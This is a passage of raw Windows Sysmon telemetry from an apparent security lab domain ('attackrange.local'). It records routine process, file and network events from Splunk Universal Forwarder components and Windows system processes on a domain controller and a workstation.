Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001051481Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:52.597{466BC892-F600-60EB-8E7D-00000000CF01}8960C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001051480Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:52.480{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65019F1741F5441EC3E7B4F2C050BF87,SHA256=7E43C4BD507D3B5C45C4CB9E5D20D3ECAA538EAF73DC765F512A68C96AD1C38A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808585Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:52.261{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A56698F946E07EFF495A00AB2384B778,SHA256=BA386C2289EDFB4ACE4E533D8544DEAA1CCF28D462FA41AD166F2DB6BAE362F6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051479Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:52.080{466BC892-F5FF-60EB-8D7D-00000000CF01}132810176C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051499Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:53.742{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F601-60EB-8F7D-00000000CF01}7868C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051498Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:53.742{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051497Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:53.742{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051496Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:53.742{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051495Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:53.742{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051494Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:53.742{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F601-60EB-8F7D-00000000CF01}7868C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051493Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:53.742{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F601-60EB-8F7D-00000000CF01}7868C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001051492Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:53.612{466BC892-F601-60EB-8F7D-00000000CF01}7868C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001051491Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:53.611{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4E0CC546BEFC9C88914F1C7F67959F2B,SHA256=45B7BBC125D6AD03C9F60AF8F805F347126DC1830F3FBC468B827620341C2B25,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051490Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:53.511{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=12553498FD26C31A2D66F6D186A924ED,SHA256=2A8B4AC93E78581B77AF5344FED538A8CC1A75DA7DB7D02346A6A699B9B7D1AE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808586Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:53.273{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A670FBAF25430C75120F43DB02AD0AC,SHA256=A3BF8484BDE4C743EE74A6F6A0040A328D00BCA307335DA6D96627E1F2CDABC0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051489Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:53.273{466BC892-F600-60EB-8E7D-00000000CF01}89601184C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051510Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:54.662{466BC892-F602-60EB-907D-00000000CF01}97568896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001051509Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:54.628{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3F5976CD0A6E18ECEE83C43A8BB4B47E,SHA256=E07FF9B5E30AF0B2002273721914D5032B52898103BE1F98A68E597B6EC54B4D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051508Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:54.627{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A4D052341CBDC1B95759333B9B2ECD9,SHA256=28E33BF70DA561E4C5797D023D67F3ABED4EC8A0D608792F3E8C972F62F6688F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808587Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:54.275{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B66C8DA1C2262DD246EF9CF1C454232,SHA256=882795EEE12EB010D5EFD4EBFD833C08149040265DFF0DE26551D97B6A8D5CA8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051507Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:54.414{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F602-60EB-907D-00000000CF01}9756C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051506Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:54.408{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F602-60EB-907D-00000000CF01}9756C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051505Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:54.408{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051504Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:54.408{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051503Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:54.408{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051502Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:54.408{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051501Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:54.408{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F602-60EB-907D-00000000CF01}9756C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001051500Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:54.238{466BC892-F602-60EB-907D-00000000CF01}9756C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001051520Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:55.846{466BC892-02AF-60E8-0D00-00000000CF01}900696C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2C00-00000000CF01}3064C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001051519Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:55.646{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BECDC065B49E249360D7B28E7CA25084,SHA256=3CFF227C658A0D3CC0619073CE4319FEAF1A27D2953D1906B3D0A794B1F8C583,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808589Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:54.251{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57337-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808588Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:55.278{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43487F42FEFF22A024AB10626DD74446,SHA256=4559187CC3CA8CC4153DEF2FD8281A3DBF5A2EAE6D16A6903F5643212EDD5725,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051518Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:55.291{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F603-60EB-917D-00000000CF01}368C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051517Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 